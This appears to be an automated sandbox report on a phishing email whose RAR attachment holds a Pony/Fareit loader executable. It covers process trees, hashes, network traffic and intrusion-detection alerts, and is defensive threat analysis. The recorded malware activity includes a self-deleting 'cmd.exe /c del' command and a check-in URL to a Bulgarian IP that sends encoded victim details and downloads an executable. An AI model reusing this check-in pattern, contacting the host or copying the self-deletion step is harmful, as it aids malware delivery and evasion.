File name: | sce-593C16DD162D5061C4BA726234C5C818.eml |
Full analysis: | https://app.any.run/tasks/d5c81270-0126-41ad-9dab-03682b0e4424 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | August 13, 2019, 12:59:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | message/rfc822 |
File info: | RFC 822 mail, ASCII text, with CRLF line terminators |
MD5: | 744CBC135DFE40C169AEA91F78EE062B |
SHA1: | D1DE11067C6F95DCF3D16FA770EB312B14B39892 |
SHA256: | 00C381ED39A284307AD87C53B575F18B2A5502DE2CA7A49266B25C6182E7EE4C |
SSDEEP: | 1536:GsoyqooBWtMT8vajF5UMFnmwI0sk64HqXSMY31bwCcD8XKXGlM:GsfqoWTN5UarBsk1qXHa1bwhgpM |
.eml | | | E-Mail message (Var. 5) (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1912 | "C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE" /eml "C:\Users\admin\AppData\Local\Temp\sce-593C16DD162D5061C4BA726234C5C818.eml" | C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
2224 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\Z1DB03P1\Возвращение товара конец июля.001" | C:\Program Files\WinRAR\WinRAR.exe | OUTLOOK.EXE | |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3600 | "C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe | WinRAR.exe | |
User: admin Integrity Level: MEDIUM Exit code: 3221225477 | ||||
2256 | "C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe" dfsr | C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe | Возвращение товара конец июля.exe | |
User: admin Integrity Level: MEDIUM Exit code: 3221225477 | ||||
936 | cmd.exe /c del /F /Q "C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe" | C:\Windows\system32\cmd.exe | — | Возвращение товара конец июля.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRED09.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\Z1DB03P1\Возвращение товара конец июля (2).001\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:461C483FB662BE1971F6AF16C0AE3B31 | SHA256:C3C76F12DAD666C2AA497B5947E13568B0AC748A05B8781389E13D3681EE8983 | |||
2256 | Возвращение товара конец июля.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@chain[1].txt | text | |
MD5:E131E6DF55C6C7FD6A57EDB5A8D065E8 | SHA256:E57A234D9594135FA1B131A123250FF4C52F913A7F5DE4CF1825FB6E1483260A | |||
1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\Z1DB03P1\Возвращение товара конец июля (2).001 | compressed | |
MD5:86CC623090DF68EAF52083B3C70011AC | SHA256:A97A760B3100BD10BB8E361DE8F83215CC128490CE4E76325396183AB0FE07FC | |||
1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\{112E06A0-0783-4A3F-846D-A14AD91799DF}\{1C306CB1-771E-4B4B-A902-86E897877F5B}.png | image | |
MD5:7D80C0A7E3849818695EAF4989186A3C | SHA256:72DC527D78A8E99331409803811CC2D287E812C008A1C869A6AEA69D7A44B597 | |||
1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\Z1DB03P1\Возвращение товара конец июля.001 | compressed | |
MD5:86CC623090DF68EAF52083B3C70011AC | SHA256:A97A760B3100BD10BB8E361DE8F83215CC128490CE4E76325396183AB0FE07FC | |||
2224 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2224.19042\Возвращение товара конец июля.exe | executable | |
MD5:7BAFBCCB742815ED665890105D4467B7 | SHA256:778AB68B705DF6518FD0EF19E592D9D4A63E3157FF902F38463EBF1330021248 | |||
1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\mapisvc.inf | text | |
MD5:48DD6CAE43CE26B992C35799FCD76898 | SHA256:7BFE1F3691E2B4FB4D61FBF5E9F7782FBE49DA1342DBD32201C2CC8E540DBD1A | |||
1912 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_E8294F8E625FFC49A7BFD9B4613883E3.dat | xml | |
MD5:EEAA832C12F20DE6AAAA9C7B77626E72 | SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1912 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
2256 | Возвращение товара конец июля.exe | GET | 200 | 185.203.119.211:80 | http://185.203.119.211/index.php?id=0&un=61646d696e&cn=555345522d5043&p=433a5c55736572735c61646d696e5c417070446174615c4c6f63616c5c54656d705c52617224455861323232342e31393034325c3f3f3f3f3f3f3f3f3f3f3f203f3f3f3f3f3f203f3f3f3f3f203f3f3f3f2e657865 | BG | executable | 97.0 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1912 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2256 | Возвращение товара конец июля.exe | 104.25.47.99:443 | chain.so | Cloudflare Inc | US | shared |
2256 | Возвращение товара конец июля.exe | 185.203.119.211:80 | — | BelCloud Hosting Corporation | BG | malicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
chain.so |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2256 | Возвращение товара конец июля.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | ET CURRENT_EVENTS WinHttpRequest Downloading EXE |
2256 | Возвращение товара конец июля.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | ET TROJAN Pony DLL Download M2 |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 2 |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | MALWARE [PTsecurity] Pony encrypted POST Data Request |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | MALWARE [PTsecurity] Pony encrypted C2 Response |
2256 | Возвращение товара конец июля.exe | A Network Trojan was detected | MALWARE [PTsecurity] Fareit/Pony CnC Server stdResponse |